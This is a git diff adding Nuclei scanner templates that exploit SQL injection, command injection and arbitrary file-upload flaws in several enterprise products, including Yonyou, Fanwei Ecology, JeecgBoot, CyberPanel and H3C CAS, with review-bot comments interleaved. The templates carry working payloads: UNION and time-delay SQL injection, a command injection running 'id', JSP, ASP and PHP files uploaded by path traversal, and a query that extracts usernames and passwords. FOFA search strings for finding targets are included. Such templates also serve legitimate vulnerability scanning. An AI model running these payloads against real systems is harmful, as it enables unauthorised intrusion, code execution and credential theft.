@@ -0,0 +1,26 @@
+id: yongyou-nc-process-sqli
+
+info:
+ name: yongyou-nc-process-sqli
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: body="/Client/Uclient/UClient.exe" || app="用友-UFIDA-NC"
+
+http:
+ - raw:
+ - |
+ GET /portal/pt/task/process?pageId=login&id=1&pluginid=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(118)||CHR(98)||CHR(118)||CHR(113)||CHR(113)||CHR(107)||CHR(98)||CHR(106)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20 HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /portal/pt/task/process?pageId=login&id=1&pluginid=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2BISNULL%28CAST%28111%2A1111%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 HTTP/1.1
+ Host: {{Hostname}}
+
+ stop-at-first-match: true
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code_1==200 && contains_all(body_1,'qvbvqqkbjq')
+ - status_code_2==200 && contains_all(body_2,'qkxqq123321qzkbq')
\ No newline at end of file
diff --git a/poc/sql/yongyou-u8c-cloud-approveservlet-sqli.yaml b/poc/sql/yongyou-u8c-cloud-approveservlet-sqli.yaml
new file mode 100644
index 0000000000..a61dadc7ae
--- /dev/null
+++ b/poc/sql/yongyou-u8c-cloud-approveservlet-sqli.yaml
@@ -0,0 +1,22 @@
+id: yongyou-u8c-cloud-approveservlet-sqli
+
+info:
+ name: yongyou-u8c-cloud-approveservlet-sqli
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: body="/api/uclient/public/"
+
+http:
+ - raw:
+ - |
+ POST /service/approveservlet HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ BILLID=123%27%20AND%20(SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28CHARINDEX%28CHAR%2849%29%2BCHAR%2854%29%2BCHAR%2846%29%2BCHAR%2848%29%2BCHAR%2846%29%2C%40%40VERSION%29%3E0%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29)=1--%20VEQc&BILLTYPE=4331&USERID=3&RESULT=4&DATASOURCE=U8cloud
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"resultdescription") && contains_all(body,"qzbkq0qjqkq")
diff --git a/poc/sql/zhilink-SRM-quickReceiptDetail-sqli.yaml b/poc/sql/zhilink-SRM-quickReceiptDetail-sqli.yaml
new file mode 100644
index 0000000000..fad86668a8
--- /dev/null
+++ b/poc/sql/zhilink-SRM-quickReceiptDetail-sqli.yaml
@@ -0,0 +1,20 @@
+id: zhilink-SRM-quickReceiptDetail-sqli
+
+info:
+ name: zhilink-SRM-quickReceiptDetail-sqli
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: body="assets/js/jweixin-1.4.0.js"
+
+http:
+ - raw:
+ - |
+ GET /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=1%20AND%20GTID_SUBSET(CONCAT(0x7162786b71,(SELECT%20(ELT(3060=3060,1))),0x7176787671),3060) HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code == 200 && contains_all(body,"qbxkq1qvxvq")
\ No newline at end of file
diff --git a/poc/sql_injection/cyberpanel-upgrademysqlstatus-rce.yaml b/poc/sql_injection/cyberpanel-upgrademysqlstatus-rce.yaml
new file mode 100644
index 0000000000..9527fa8bbe
--- /dev/null
+++ b/poc/sql_injection/cyberpanel-upgrademysqlstatus-rce.yaml
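Review bot: In yongyou-u8c-cloud-approveservlet-sqli the matcher `contains_all(body,"qzbkq0qjqkq")` pins the `0` branch of the request's CASE expression, so a server whose `@@VERSION` contains `16.0.` answers with `qzbkq1qjqkq` and is reported as not affected. Accepting either digit closes that false negative, e.g. `status_code==200 && contains_all(body,"resultdescription") && regex("qzbkq[01]qjqkq", body)`. The copy of this file under poc/sql_injection/ carries the same matcher and needs the same change.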
@@ -0,0 +1,24 @@
+id: cyberpanel-upgrademysqlstatus-rce
+
+info:
+ name: cyberpanel-upgrademysqlstatus-rce
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="CyberPanel"
+
+http:
+ - raw:
+ - |
+ GET /dataBases/upgrademysqlstatus HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
+ Content-Type: application/json
+ Connection: close
+
+ {"statusfile":"1;id;#"}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"uid=") && contains_all(body,"gid=")
\ No newline at end of file
diff --git a/poc/sql_injection/fanwei-Ecology-LoginSSO-sqli.yaml b/poc/sql_injection/fanwei-Ecology-LoginSSO-sqli.yaml
new file mode 100644
index 0000000000..2c70d7a8b4
--- /dev/null
+++ b/poc/sql_injection/fanwei-Ecology-LoginSSO-sqli.yaml
@@ -0,0 +1,29 @@
+id: fanwei-Ecology-LoginSSO-sqli
+
+info:
+ name: fanwei-Ecology-LoginSSO-sqli
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: app="泛微-OA(e-cology)"
+
+requests:
+ - raw:
+ - |+
+ GET /weaver/FileDownloadLocation/login/LoginSSO.%2520jsp?ddcode=7ea7ef3c41d67297&mrfuuid=1%27;if+db_name(1)=%27master%27+WAITFOR+delay+%270:0:3%27--+&mailid=0&a=.swf HTTP/1.1
+ Host: {{Hostname}}
+ Connection: close
+ Accept-Encoding: gzip, deflate
+
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - duration > 3 && duration < 6 && status_code==302
+
+
+
+ extractors:
+ - type: dsl
+ dsl:
+ - duration
\ No newline at end of file
diff --git a/poc/sql_injection/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml b/poc/sql_injection/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml
new file mode 100644
index 0000000000..85846ae883
--- /dev/null
+++ b/poc/sql_injection/fanwei-Ecology-browser-sqli-CNVD-2023-12632.yaml
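Review bot: In cyberpanel-upgrademysqlstatus-rce the matcher accepts any 200 response whose body contains the substrings `uid=` and `gid=` anywhere, which ordinary pages with query strings or form fields can satisfy. Anchoring on the shape of the command output, for example a `type: regex` matcher with `uid=\d+\([^)]+\)\s+gid=\d+`, removes most of those false positives. The template runs a command on the scanned host but has no `tags`, so it cannot be excluded from routine scans; `tags: cyberpanel,rce,intrusive` would make it opt-in. It is also filed under poc/sql_injection/ although its id and request describe command injection.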
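Review bot: In fanwei-Ecology-LoginSSO-sqli the only evidence is `duration > 3 && duration < 6 && status_code==302` on a single request, so any redirect that happens to take three to six seconds on a slow or loaded host is reported as SQL injection. A baseline request without the delay, with the matcher comparing the two durations, would make the timing signal meaningful; qiwang-ERP-drawGrid-sqli uses the same single-sample check and needs the same treatment. The `condition: and` on a one-expression `dsl` list has no effect, and this file uses the older `requests:` key where most templates in this commit use `http:`.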
@@ -0,0 +1,28 @@ +id: fanwei-Ecology-browser-sqli + +info: + name: fanwei-Ecology-browser-sqli + author: PokerSec + severity: high + metadata: + fofasearch: app="泛微-OA(e-cology)" + +requests: + - raw: + - |- + POST /mobile/%20/plugin/browser.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + isDis=1&browserTypeId=269&keyword=%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%30%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%36%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%33%38%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%36%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%35%25%32%35%25%33%
37%25%33%32%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%37%25%32%35%25%33%36%25%33%38%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%33%37%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%33%34%25%32%35%25%33%33%25%36%34%25%32%35%25%33%32%25%33%37%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%31%25%32%35%25%33%36%25%33%34%25%32%35%25%33%36%25%36%34%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - countSql + - baseSql + - type: status + status: + - 200 diff --git a/poc/sql_injection/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml b/poc/sql_injection/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml new file mode 100644 index 0000000000..fb0e831cf5 --- /dev/null +++ b/poc/sql_injection/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml 
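Review bot: In fanwei-Ecology-browser-sqli the `word` matcher lists `countSql` and `baseSql` without a `condition`, and a word list defaults to `or`, so a 200 response containing either string alone is reported. Adding `condition: and` under that matcher requires both. The file name carries CNVD-2023-12632 but neither `id` nor `info` records it and there is no `description`, so a finding cannot be traced back to the advisory; putting the identifier in `info.description` would fix that.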
@@ -0,0 +1,23 @@
+id: jeecg-boot-getTotalData-sqli-CVE-2024-48307
+
+info:
+ name: jeecg-boot-getTotalData-sqli-CVE-2024-48307
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: app="JeecgBoot-企业级低代码平台" || body="/_app.config.js?v=3.7.1"
+
+http:
+ - raw:
+ - |-
+ POST /jeecg-boot/drag/onlDragDatasetHead/getTotalData HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+
+ {"tableName":"sys_user","compName":"test","condition":{"filter":{}},"config":{"assistValue":[],"assistType":[],"name":[{"fieldName":"concat(username,0x3a,password)","fieldType":"string"},{"fieldName":"id","fieldType":"string"}],"value":[{"fieldName":"id","fieldType":"1"}],"type":[]}}
+
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200 && contains_all(body,"chartData") && contains_all(body,"concat(username") && contains_all(body,"yAxisIndex")
\ No newline at end of file
diff --git a/poc/sql_injection/qiwang-ERP-drawGrid-sqli.yaml b/poc/sql_injection/qiwang-ERP-drawGrid-sqli.yaml
new file mode 100644
index 0000000000..ff2f12c411
--- /dev/null
+++ b/poc/sql_injection/qiwang-ERP-drawGrid-sqli.yaml
@@ -0,0 +1,29 @@
+id: qiwang-ERP-drawGrid-sqli
+
+info:
+ name: qiwang-ERP-drawGrid-sqli
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="企望-ERP系统"
+
+http:
+ - raw:
+ - |
+ POST /mainFunctions/drawGrid.action;cookieLogin.action HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ tablename=1';WAITFOR DELAY '0:0:3'--
+
+
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code==200 && duration > 3 && duration < 6
+
+ extractors:
+ - type: dsl
+ dsl:
+ - duration
\ No newline at end of file
diff --git a/poc/sql_injection/yongyou-nc-process-sqli.yaml b/poc/sql_injection/yongyou-nc-process-sqli.yaml
new file mode 100644
index 0000000000..d4310a0d4c
--- /dev/null
+++ b/poc/sql_injection/yongyou-nc-process-sqli.yaml
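Review bot: The jeecg-boot request asks the server for `concat(username,0x3a,password)` from `sys_user`, so every positive result pulls real account names and password values into the response and from there into scanner output and logs. The matcher only looks for the echoed field name (`concat(username`), `chartData` and `yAxisIndex`, so the request and matcher could use a constant expression and prove the same thing without collecting credentials. `condition: and` on a single-entry `dsl` list is redundant, and the template has no `tags` to mark it as intrusive.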
@@ -0,0 +1,26 @@
+id: yongyou-nc-process-sqli
+
+info:
+ name: yongyou-nc-process-sqli
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: body="/Client/Uclient/UClient.exe" || app="用友-UFIDA-NC"
+
+http:
+ - raw:
+ - |
+ GET /portal/pt/task/process?pageId=login&id=1&pluginid=1%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(118)||CHR(98)||CHR(118)||CHR(113)||CHR(113)||CHR(107)||CHR(98)||CHR(106)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20 HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /portal/pt/task/process?pageId=login&id=1&pluginid=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2BISNULL%28CAST%28111%2A1111%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%2898%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 HTTP/1.1
+ Host: {{Hostname}}
+
+ stop-at-first-match: true
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code_1==200 && contains_all(body_1,'qvbvqqkbjq')
+ - status_code_2==200 && contains_all(body_2,'qkxqq123321qzkbq')
\ No newline at end of file
diff --git a/poc/sql_injection/yongyou-u8c-cloud-approveservlet-sqli.yaml b/poc/sql_injection/yongyou-u8c-cloud-approveservlet-sqli.yaml
new file mode 100644
index 0000000000..a61dadc7ae
--- /dev/null
+++ b/poc/sql_injection/yongyou-u8c-cloud-approveservlet-sqli.yaml
@@ -0,0 +1,22 @@
+id: yongyou-u8c-cloud-approveservlet-sqli
+
+info:
+ name: yongyou-u8c-cloud-approveservlet-sqli
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: body="/api/uclient/public/"
+
+http:
+ - raw:
+ - |
+ POST /service/approveservlet HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ BILLID=123%27%20AND%20(SELECT%20CHAR%28113%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28107%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28CHARINDEX%28CHAR%2849%29%2BCHAR%2854%29%2BCHAR%2846%29%2BCHAR%2848%29%2BCHAR%2846%29%2C%40%40VERSION%29%3E0%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28113%29)=1--%20VEQc&BILLTYPE=4331&USERID=3&RESULT=4&DATASOURCE=U8cloud
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body,"resultdescription") && contains_all(body,"qzbkq0qjqkq")
diff --git a/poc/sql_injection/zhilink-SRM-quickReceiptDetail-sqli.yaml b/poc/sql_injection/zhilink-SRM-quickReceiptDetail-sqli.yaml
new file mode 100644
index 0000000000..fad86668a8
--- /dev/null
+++ b/poc/sql_injection/zhilink-SRM-quickReceiptDetail-sqli.yaml
@@ -0,0 +1,20 @@
+id: zhilink-SRM-quickReceiptDetail-sqli
+
+info:
+ name: zhilink-SRM-quickReceiptDetail-sqli
+ author: PokerSec
+ severity: high
+ metadata:
+ fofasearch: body="assets/js/jweixin-1.4.0.js"
+
+http:
+ - raw:
+ - |
+ GET /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=1%20AND%20GTID_SUBSET(CONCAT(0x7162786b71,(SELECT%20(ELT(3060=3060,1))),0x7176787671),3060) HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code == 200 && contains_all(body,"qbxkq1qvxvq")
\ No newline at end of file
diff --git a/poc/upload/EKing-Base64Upload-fileupload.yaml b/poc/upload/EKing-Base64Upload-fileupload.yaml
new file mode 100644
index 0000000000..e0902982c6
--- /dev/null
+++ b/poc/upload/EKing-Base64Upload-fileupload.yaml
@@ -0,0 +1,31 @@
+id: EKing-Base64Upload-fileupload
+
+info:
+ name: EKing-Base64Upload-fileupload
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="EKing-管理易"
+variables:
+ filename: "{{to_lower(rand_base(10))}}"
+
+
+http:
+ - raw:
+ - |
+ POST /Base64Upload.ihtm HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ base64_str=data:image//../../../{{filename}}.jsp.;base64,dGVzdDEyM3Rlc3Q=
+
+ - |
+ GET /{{filename}}.jsp HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ matchers:
+ - type: dsl
+ dsl:
+ - status_code==200 && contains_all(body_2,"test123test")
+
diff --git a/poc/upload/chanjet-TPlus-FileUploadHandler-uploadfile.yaml b/poc/upload/chanjet-TPlus-FileUploadHandler-uploadfile.yaml
new file mode 100644
index 0000000000..824f0098d2
--- /dev/null
+++ b/poc/upload/chanjet-TPlus-FileUploadHandler-uploadfile.yaml
@@ -0,0 +1,36 @@
+id: chanjet-TPlus-FileUploadHandler-uploadfile
+
+info:
+ name: chanjet-TPlus-FileUploadHandler-uploadfile
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: app="畅捷通-TPlus"
+variables:
+ filename: "{{to_lower(rand_base(6))}}"
+ flag: "{{to_lower(rand_base(10))}}"
+requests:
+ - raw:
+ - |-
+ POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6
+
+ --f95ec6be8c3acff8e3edd3d910d3b9a6
+ Content-Disposition: form-data; name="file"; filename="{{filename}}.txt"
+ Content-Type: image/jpeg
+
+ {{flag}}
+ --f95ec6be8c3acff8e3edd3d910d3b9a6--
+ - |-
+ GET /tplus/UserFiles/{{filename}}.txt HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_1 == 200'
+ - 'status_code_2 == 200'
+ - 'contains(body_2,"{{flag}}")'
+ condition: and
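Review bot: Nothing in EKing-Base64Upload-fileupload removes the uploaded `{{filename}}.jsp` after the check, so every affected host that is scanned keeps a stray file in its web root; the chanjet-TPlus, h3c-CAS-CVM, inspur-GS, nuuo, poguanjia and yonyou-U8clouderp upload templates in this commit leave their files behind in the same way. None of them declares `tags`, so they cannot be kept out of default runs; `tags: fileupload,intrusive` on each would allow that, and a short `description` should say that the template writes to the target. In this file the matcher mixes an unsuffixed `status_code` with `body_2`; `status_code_2==200 && contains_all(body_2,"test123test")` states which response is meant.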
diff --git a/poc/upload/filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7.yaml b/poc/upload/filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7.yaml new file mode 100644 index 0000000000..8e1c5f5c79 --- /dev/null +++ b/poc/upload/filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7.yaml @@ -0,0 +1,59 @@ +id: filestack-upload-eef332a3e9a940fc24b6a8b85a58d6b7 + +info: + name: > + Filestack Official <= 2.0.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/559a94d8-527d-48b3-a917-461ebfa012bc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/filestack-upload/" + google-query: inurl:"/wp-content/plugins/filestack-upload/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,filestack-upload,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/filestack-upload/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "filestack-upload" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file diff --git a/poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml b/poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml new file mode 100644 index 0000000000..43e5425e5d --- /dev/null +++ b/poc/upload/h3c-CAS-CVM-fd-uploadfile.yaml 
@@ -0,0 +1,42 @@
+id: h3c-CAS-CVM-fd-uploadfile
+
+info:
+ name: h3c-CAS-CVM-fd-uploadfile
+ author: PokerSEC
+ severity: critical
+ metadata:
+ fofasearch: body="css/img/loginpage.png"
+variables:
+ filename: "{{to_lower(rand_base(10))}}"
+ flag: "{{to_lower(rand_base(10))}}"
+http:
+ - raw:
+ - |-
+ POST /cas/fileUpload/fd HTTP/1.1
+ Host:
+ Accept-Encoding: gzip, deflate
+ Accept: */*
+ Connection: close
+ Content-Type: multipart/form-data; boundary=WebKitFormBoundaryMMqEBbEFHlzOcYq4
+
+ --WebKitFormBoundaryMMqEBbEFHlzOcYq4
+ Content-Disposition: form-data; name="token"
+
+ /../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{filename}}.jsp
+ --WebKitFormBoundaryMMqEBbEFHlzOcYq4
+ Content-Disposition: form-data; name="file"; filename="{{filename}}.jsp"
+ Content-Type: image/png
+
+ <% out.println("{{flag}}");%>
+ --WebKitFormBoundaryMMqEBbEFHlzOcYq4--
+
+ - |+
+ GET /cas/js/lib/buttons/{{filename}}.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code_1==200 && status_code_2==200 && contains_all(body_2,"{{flag}}")
diff --git a/poc/upload/inspur-GS-UploadListFile-uploadfile.yaml b/poc/upload/inspur-GS-UploadListFile-uploadfile.yaml
new file mode 100644
index 0000000000..7d7f86e084
--- /dev/null
+++ b/poc/upload/inspur-GS-UploadListFile-uploadfile.yaml
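Review bot: The first raw request in h3c-CAS-CVM-fd-uploadfile has an empty `Host:` header, at least as the patch is rendered here, while the second uses `Host: {{Hostname}}`; with no host the first step is likely rejected or misrouted, and the template then reports nothing even on an affected system. inspur-GS-UploadListFile has the same empty header in its first request. Both should read `Host: {{Hostname}}` like the rest of the commit. `matchers-condition: and` together with `condition: and` on a single `dsl` expression adds nothing and can be dropped.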
@@ -0,0 +1,39 @@
+id: inspur-GS-UploadListFile-uploadfile
+
+info:
+ name: inspur-GS-UploadListFile-uploadfile
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: body="/cwbase/web/gsprtf/"
+
+http:
+ - raw:
+ - |-
+ POST /cwbase/EP/ListContent/UploadListFile.ashx?uptype=attslib&keyid=1&key1=1&key2=1 HTTP/1.1
+ Host:
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0
+ Content-Length: 273
+ Accept: /
+ Accept-Encoding: gzip, deflate, br
+ Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ Connection: close
+ Content-Type: multipart/form-data; boundary=---------------------------rww5upkbw6ctf0tu5hye
+
+ -----------------------------rww5upkbw6ctf0tu5hye
+ Content-Disposition: form-data; name="file"; filename="../../../../../../j1gcettjkv.asp"
+ Content-Type: image/png
+
+ <% response.write("2lN0nxVzC7jYTvuIOcbWyy2AwsK")%>
+ -----------------------------rww5upkbw6ctf0tu5hye--
+
+ - |+
+ GET /cwbase/j1gcettjkv.asp HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ condition: and
+ dsl:
+ - status_code_2==200 && contains_all(body_2,"2lN0nxVzC7jYTvuIOcbWyy2AwsK")
\ No newline at end of file
diff --git a/poc/upload/jinhuadijia-weixinshangqiang-mobile-fileupload.yaml b/poc/upload/jinhuadijia-weixinshangqiang-mobile-fileupload.yaml
new file mode 100644
index 0000000000..7cdc107df0
--- /dev/null
+++ b/poc/upload/jinhuadijia-weixinshangqiang-mobile-fileupload.yaml
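Review bot: The file name `j1gcettjkv.asp` and the marker string in inspur-GS-UploadListFile are hard-coded, and the matcher looks only at the second response, so once any earlier scan has left that file in place, later scans keep reporting the host even after the upload flaw is fixed. Per-run values declared under `variables`, as the neighbouring upload templates do with `filename: "{{to_lower(rand_base(10))}}"` and a matching `flag`, tie a match to the current run. The fixed `Content-Length: 273` and the `Accept: /` header look like leftovers from a captured request and should be removed or corrected rather than maintained by hand.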
@@ -0,0 +1,33 @@
+id: jinhuadijia-weixinshangqiang-mobile-fileupload
+
+info:
+ name: jinhuadijia-weixinshangqiang-mobile-fileupload
+ author: PokerSec
+ severity: critical
+ metadata:
+ fofasearch: body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
+
+
+variables:
+ filename: "{{to_lower(rand_base(10))}}"
+
+
+requests:
+ - raw:
+ - |+
+ POST /mobile/mobile.do.php?action=msg_uploadimg HTTP/2
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ filetype=php&imgbase64=PD9waHAgZWNobyJzNDY5Z25uOTUwNm0ycjhyN2wzZ2JoNWszNyI7dW5saW5rKF9fRklMRV9fKTs/Pg==
+
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - data\/pic\/pic
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/poc/upload/meite-crm-upload-upload.yaml b/poc/upload/meite-crm-upload-upload.yaml
new file mode 100644
index 0000000000..093cb653bb
--- /dev/null
+++ b/poc/upload/meite-crm-upload-upload.yaml
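Review bot: A match in jinhuadijia-weixinshangqiang-mobile-fileupload needs only a 200 response containing `data\/pic\/pic`; the stored file is never requested, so the template cannot tell a stored but inert file from one the server will execute. The uploaded content appears to delete itself when it runs, but since nothing requests it, the file stays on the host. A second request for the returned path, with the matcher checking the marker in `body_2`, would both confirm the finding and trigger that cleanup. The `filename` variable is declared but never used, and the request line says `HTTP/2` unlike every other template in the commit, which is worth confirming.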
@@ -0,0 +1,58 @@
+id: meite-crm-upload-upload
+
+info:
+ name: meite-crm-upload-upload
+ author: saf3d0s
+ severity: critical
+ description: description
+ reference:
+ - https://
+ tags: tags
+
+requests:
+ - raw:
+ - |-
+ POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
+ Host: {{Hostname}}
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
+ Content-Length: 708
